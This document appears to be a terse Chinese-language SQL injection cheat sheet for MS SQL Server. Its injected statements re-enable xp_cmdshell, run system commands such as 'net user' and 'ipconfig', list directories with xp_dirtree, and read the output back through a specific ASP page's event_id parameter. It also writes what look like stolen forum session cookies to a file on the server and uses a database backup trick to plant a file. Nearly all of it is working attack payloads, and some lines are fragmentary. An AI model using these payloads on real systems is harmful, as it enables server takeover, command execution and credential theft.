恢复cmd
;insert tb1 exec master..xp_cmdshell'net user '--
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
执行命令:
sql: ;ipconfig -all--
dos:
;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell
"ipconfig
-all"--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0
列目录:
c: jiaozhu 临时表
;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu
EXEC
MASTER..XP_dirtree "c:",1,1--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0
上传文件:
本地路径:C:\Inetpub\wwwroot\cook.txt 保存位置:c:
数据库存储过程:
;exec master..xp_cmdshell ' echo
cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%
20cdb_visitedfid=12;%2
0cdb_oldtopics=D8D>c:\'--
数据库备份:(上传后删除临时表)
;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--
;insert into xiaopan(cmd) values(' echoStr ')--
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH
DIFFERENTIAL,FORMAT--
;Drop table [xiaopan]--
